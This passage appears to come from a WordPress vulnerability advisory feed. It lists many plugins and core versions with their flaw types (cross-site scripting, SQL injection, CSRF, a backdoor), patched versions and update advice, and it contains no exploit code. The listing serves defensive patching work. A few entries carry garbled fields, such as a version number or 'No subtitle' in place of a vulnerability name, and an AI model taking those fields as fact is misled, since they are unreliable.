Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Authenticated (Editor+) Directory Traversal
Patched Version: 22.6
Recommended Action: Update to version 22.6, or a newer patched version

Plugin: Store Exporter for WooCommerce – Export Products, Export Orders, Export Subscriptions, and More

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: WooCommerce Green Wallet Gateway

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Slideshow, Image Slider by 2J

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: EWWW Image Optimizer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Zip Attachments

Vulnerability: Directory Traversal
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Cross-Site Scripting via method
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: WooCommerce Product Add-ons

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.2.0
Recommended Action: Update to version 6.2.0, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Unprotected REST-API to Email Injection
Patched Version: 3.5.8
Recommended Action: Update to version 3.5.8, or a newer patched version

Plugin: FiboSearch – Ajax Search for WooCommerce

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.17.0
Recommended Action: Update to version 1.17.0, or a newer patched version

Plugin: ShiftController Employee Shift Scheduling

Vulnerability: Reflected Cross-Site Scripting via Query String
Patched Version: 4.9.26
Recommended Action: Update to version 4.9.26, or a newer patched version

Plugin: WP Attachments

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.0.6
Recommended Action: Update to version 5.0.6, or a newer patched version

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Core: WordPress

Vulnerability: Brute Force Password Recovery Tokens
Patched Version: 4.4
Recommended Action: Update to version 4.4, or a newer patched version

Plugin: Redirection

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Core: WordPress

Vulnerability: Super Admin Multi-Site Installation Object Injection
Patched Version: 3.7.37
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.37, 3.8.37, 3.9.35, 4.0.34, 4.1.34, 4.2.31, 4.3.27, 4.4.26, 4.5.25, 4.6.22, 4.7.22, 4.8.18, 4.9.19, 5.0.15, 5.1.12, 5.2.14, 5.3.11, 5.4.9, 5.5.8, 5.6.7, 5.7.5, 5.8.3

Plugin: Caldera Forms Google Sheets Connector

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in exec_admin_widget function
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Easy Forms for Mailchimp

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.8.9
Recommended Action: Update to version 6.8.9, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.24.1
Recommended Action: Update to version 4.24.1, or a newer patched version

Plugin: Aspose Importer & Exporter (Discontinued)

Vulnerability: Arbitrary File Download
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Shortcodes
Patched Version: 3.7.22
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.22, 3.8.22, 3.9.20, 4.0.19, 4.1.19, 4.2.16, 4.3.12, 4.4.11, 4.5.10, 4.6.7, 4.7.6, 4.8.2

Plugin: DeepL API translation plugin

Vulnerability: Cross-Site Request Forgery via wpdeepl_prune_logs
Patched Version: 2.4.1.2
Recommended Action: Update to version 2.4.1.2, or a newer patched version

Plugin: Hummingbird Performance – Cache & Page Speed Optimization for Core Web Vitals | Critical CSS | Minify CSS | Defer CSS Javascript | CDN

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Credit Tracker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Avirato hotels online booking engine

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BestWebSoft’s Pinterest

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Extended Post Status

Vulnerability: Missing Authorization via wp_insert_post_data
Patched Version: 1.0.20
Recommended Action: Update to version 1.0.20, or a newer patched version

Plugin: Contact Form Email

Vulnerability: Captcha Bypass
Patched Version: 1.3.42
Recommended Action: Update to version 1.3.42, or a newer patched version

Plugin: EG-Attachments

Vulnerability: Reflected Cross-Site Scripting via ‘paged’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Plainview Protect Passwords

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Use Memcached

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Portfolio Gallery – Photo Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.11
Recommended Action: Update to version 2.1.11, or a newer patched version

Plugin: WordLift – AI powered SEO – Schema

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.37.2
Recommended Action: Update to version 3.37.2, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.5.7
Recommended Action: Update to version 5.5.7, or a newer patched version

Plugin: 404 SEO Redirection

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: MainWP Broken Link Checker

Vulnerability: Missing Authorization to Arbitrary Plugin Activation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Stock Exporter for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Booking Ultra Pro Appointments Booking Calendar Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Custom Background

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Sitemap Page

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Podcast Subscribe Buttons

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: PDF Generator For Fluent Forms – The Contact Form Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Missing Authorization to Settings Update
Patched Version: 3.13.2
Recommended Action: Update to version 3.13.2, or a newer patched version

Plugin: Quill Forms | The Best Typeform Alternative | Create Conversational Multi Step Form, Survey, Quiz, Cost Estimation or Donation Form on WordPress

Vulnerability: Missing Authorization
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: Transposh WordPress Translation

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Newsletter, SMTP, Email marketing and Subscribe forms by Brevo (formely Sendinblue)

Vulnerability: Reflected Cross-Site Scripting via ‘lang’
Patched Version: 3.1.61
Recommended Action: Update to version 3.1.61, or a newer patched version

Plugin: Zlick Paywall

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Core: WordPress

Vulnerability: Private Post Disclosure
Patched Version: 3.7.33
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.33, 3.8.33, 3.9.31, 4.0.30, 4.1.30, 4.2.27, 4.3.23, 4.4.22, 4.5.21, 4.6.18, 4.7.17, 4.8.13, 4.9.14, 5.0.9, 5.1.5, 5.2.6, 5.3.3, 5.4.1

Plugin: Chained Quiz

Vulnerability: Reflected Cross-Site Scripting via date
Patched Version: 1.3.2.4
Recommended Action: Update to version 1.3.2.4, or a newer patched version

Plugin: TrustMate.io – WooCommerce integration

Vulnerability: Authenticated (Subscriber+) Arbitrary Settings Update
Patched Version: 1.8.12
Recommended Action: Update to version 1.8.12, or a newer patched version

Plugin: WooCommerce Eway Gateway

Vulnerability: Insecure Direct Object Reference
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: Affiliate For WooCommerce

Vulnerability: Authenticated Insecure Direct Object Reference
Patched Version: 4.8.0
Recommended Action: Update to version 4.8.0, or a newer patched version

Plugin: ARI Stream Quiz – WordPress Quizzes Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Absolute Privacy

Vulnerability: Authentication Bypass
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Splash Header

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.20.8
Recommended Action: Update to version 1.20.8, or a newer patched version

Plugin: Portfolio Slideshow Pro

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom Banners

Vulnerability: Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: GdeSlon Affiliate Shop

Vulnerability: Open Redirect
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 7.3.5
Recommended Action: Update to version 7.3.5, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 13.2.9
Recommended Action: Update to version 13.2.9, or a newer patched version

Plugin: Popup Manager

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: SQL Injection
Patched Version: 2.0.16
Recommended Action: Update to version 2.0.16, or a newer patched version

Plugin: WP Affiliate Platform

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.3.9
Recommended Action: Update to version 6.3.9, or a newer patched version

Plugin: WH Testimonials

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom Post Type List Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Chained Quiz

Vulnerability: Reflected Cross-Site Scripting via pointsf
Patched Version: 1.3.2.1
Recommended Action: Update to version 1.3.2.1, or a newer patched version

Plugin: WP All Export Pro

Vulnerability: Cross-Site Request Forgery to Remote Code Execution
Patched Version: 1.8.6
Recommended Action: Update to version 1.8.6, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: SQL Injection
Patched Version: 3.9.1
Recommended Action: Update to version 3.9.1, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: WordPress WP-Advanced-Search

Vulnerability: Unauthenticated Database Export
Patched Version: 3.3.4
Recommended Action: Update to version 3.3.4, or a newer patched version

Plugin: Comment Extra Fields

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP SVG Images

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via SVG
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: WP-TopBar

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced iFrame

Vulnerability: No subtitle
Patched Version: 2022
Recommended Action: Update to version 2022, or a newer patched version

Plugin: ARI Stream Quiz – WordPress Quizzes Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: iThemes Builder Style Manager

Vulnerability: Cross-Site Scripting
Patched Version: 0.7.7
Recommended Action: Update to version 0.7.7, or a newer patched version

Plugin: S3Bubble Cloud Video with Adverts and Analytics

Vulnerability: Arbitrary File Download
Patched Version: 4.8
Recommended Action: Update to version 4.8, or a newer patched version

Plugin: Carousel CK

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Invite Anyone

Vulnerability: PHP Object Injection
Patched Version: 1.3.19
Recommended Action: Update to version 1.3.19, or a newer patched version

Plugin: TS Poll – Survey, Versus Poll, Image Poll, Video Poll

Vulnerability: Missing Authorization
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: JS Help Desk – The Ultimate Help Desk & Support Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘deleteCacheToolbar’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: WP Custom Post Template

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Role Editor

Vulnerability: Authenticated Privilege Escalation
Patched Version: 4.25
Recommended Action: Update to version 4.25, or a newer patched version

Plugin: Logo Slider and Showcase

Vulnerability: Settings Update
Patched Version: 1.3.37
Recommended Action: Update to version 1.3.37, or a newer patched version

Plugin: YOP Poll

Vulnerability: Author+ Stored Cross-Site Scripting
Patched Version: 6.3.5
Recommended Action: Update to version 6.3.5, or a newer patched version

Plugin: Plezi

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Tooltipy (tooltips for WP)

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.1
Recommended Action: Update to version 5.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Ultimate Addons for Beaver Builder – Lite

Vulnerability: Missing Authorization
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery to Authentication Takeover
Patched Version: 3.7.4
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.4, 3.8.4, 3.9.2

Plugin: BulletProof Security

Vulnerability: SQL Injection
Patched Version: .51.1
Recommended Action: Update to version .51.1, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Stored Cross-Site Scripting via Uploaded SVG
Patched Version: 1.5.79
Recommended Action: Update to version 1.5.79, or a newer patched version

Plugin: WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting

Vulnerability: Authenticated (Accounting manager+) SQL Injection
Patched Version: 1.12.9
Recommended Action: Update to version 1.12.9, or a newer patched version

Plugin: Image Gallery with Slideshow Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pro Mime Types – Manage file media types

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: CF7 Skins for Contact Form 7

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Authenticated (Admin+) PHAR Deserialization
Patched Version: 0.9.75
Recommended Action: Update to version 0.9.75, or a newer patched version

Plugin: Laposta Signup Basic

Vulnerability: Missing Authorization
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Bootstrap Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Events Addon for Elementor

Vulnerability: Missing Authorization
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: wordpress vertical image slider plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Core: WordPress

Vulnerability: 5.8
Patched Version: 5.4.7
Recommended Action: Update to one of the following versions, or a newer patched version: 5.4.7, 5.5.6, 5.6.5, 5.7.3, 5.8.1

Plugin: Widget Control Powered By Everyblock

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Broken Link Manager

Vulnerability: SQL Injection
Patched Version: 0.5.0
Recommended Action: Update to version 0.5.0, or a newer patched version

Plugin: Announcement & Notification Banner – Bulletin

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: Car Seller – Auto Classifieds Script

Vulnerability: Auto Classifieds Script <= 2.1.0
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: JobSearch WP Job Board

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Quick Paypal Payments

Vulnerability: Missing Authorization
Patched Version: 5.7.26
Recommended Action: Update to version 5.7.26, or a newer patched version

Plugin: BuddyPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 11.3.2
Recommended Action: Update to version 11.3.2, or a newer patched version

Plugin: FastDup – Fastest WordPress Migration & Duplicator

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: Shortcode Factory

Vulnerability: Local File Inclusion
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: Instant CSS

Vulnerability: Missing Authorization via AJAX Actions
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program.

Vulnerability: Missing Authorization
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: dTabs

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PPOM – Product Addons & Custom Fields for WooCommerce

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 18.4
Recommended Action: Update to version 18.4, or a newer patched version

Plugin: Latest Posts by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.3
Recommended Action: Update to version 0.3, or a newer patched version

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: Arbitrary Backup Creation and Download
Patched Version: 0.5.10
Recommended Action: Update to version 0.5.10, or a newer patched version

Plugin: FOX – Currency Switcher Professional for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.7.1
Recommended Action: Update to version 1.3.7.1, or a newer patched version

Plugin: Corner Ad

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.54
Recommended Action: Update to version 1.0.54, or a newer patched version

Plugin: Export any WordPress data to XML/CSV

Vulnerability: Authenticated SQL Injection
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Backup and Staging by WP Time Capsule

Vulnerability: Authentication Bypass
Patched Version: 1.21.16
Recommended Action: Update to version 1.21.16, or a newer patched version

Plugin: Crony Cronjob Manager

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 0.4.7
Recommended Action: Update to version 0.4.7, or a newer patched version

Plugin: Launchpad – Coming Soon & Maintenance Mode Plugin

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Multiplayer Games

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Protected Posts Logout Button

Vulnerability: Missing Authorization on pplb_options_save
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: SQL Injection
Patched Version: 0.60
Recommended Action: Update to version 0.60, or a newer patched version

Plugin: Easy Forms for Mailchimp

Vulnerability: 5.0.6
Patched Version: 5.0.7
Recommended Action: Update to version 5.0.7, or a newer patched version

Plugin: Paytm – Donation Plugin

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Banner – Easily add multiple Banners/Bars/Notifications/Announcements to the top or bottom of your website

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.10.4
Recommended Action: Update to version 2.10.4, or a newer patched version

Plugin: Client Portal – Private user pages and login

Vulnerability: Cross-Site Request Forgery via cp_create_private_pages_for_all_users function
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Jupiter X Core

Vulnerability: Unauthenticated Privilege Escalation
Patched Version: 3.4.3
Recommended Action: Update to version 3.4.3, or a newer patched version

Plugin: Analytify – Google Analytics Dashboard For WordPress (GA4 analytics made easy)

Vulnerability: Authorization Bypass
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: Login Configurator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LWS Cleaner

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: wpMandrill

Vulnerability: Missing Authorization via getAjaxStats
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Constant Contact Forms

Vulnerability: Missing Authorization via constant_contact_privacy_ajax_handler
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Import and export users and customers

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.14.0.3
Recommended Action: Update to version 1.14.0.3, or a newer patched version

Plugin: flickrRSS

Vulnerability: Cross-Site Scripting via flickrRSS_tags
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gift Certificate Creator

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Lead-Octopus-Power

Vulnerability: SQL Injection
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Registrations for the Events Calendar – Event Registration Plugin

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.7.6
Recommended Action: Update to version 2.7.6, or a newer patched version

Plugin: Recommend to a friend

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: php-shell

Vulnerability: Backdoor
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Remote Code Execution
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Dropdown and scrollable Text

Vulnerability: Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Cloudflare

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.21
Recommended Action: Update to version 1.3.21, or a newer patched version

Plugin: 10WebSocial

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: WP No External Links

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: New User Approve

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Stock Ticker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.23.5
Recommended Action: Update to version 3.23.5, or a newer patched version

Plugin: Download Manager

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.2.35
Recommended Action: Update to version 3.2.35, or a newer patched version

Plugin: MZ Mindbody API

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: Stock Sync for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Sales Report for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 3.5.7.7
Recommended Action: Update to version 3.5.7.7, or a newer patched version

Plugin: WooCommerce Checkout & Funnel Builder by CartFlows – Create High Converting Stores For WooCommerce

Vulnerability: Insecure Direct Object Reference to Arbitrary Post Deletion
Patched Version: 1.11.12
Recommended Action: Update to version 1.11.12, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Unauthenticated iFrame Injection via Paragraph and Short Answer
Patched Version: 8.0.5
Recommended Action: Update to version 8.0.5, or a newer patched version

Plugin: VDZ Google Analytics or Google Tag Manager / GTM

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: HUSKY – Products Filter Professional for WooCommerce

Vulnerability: Unauthenticated SQL Injection via search terms
Patched Version: 1.3.4.3
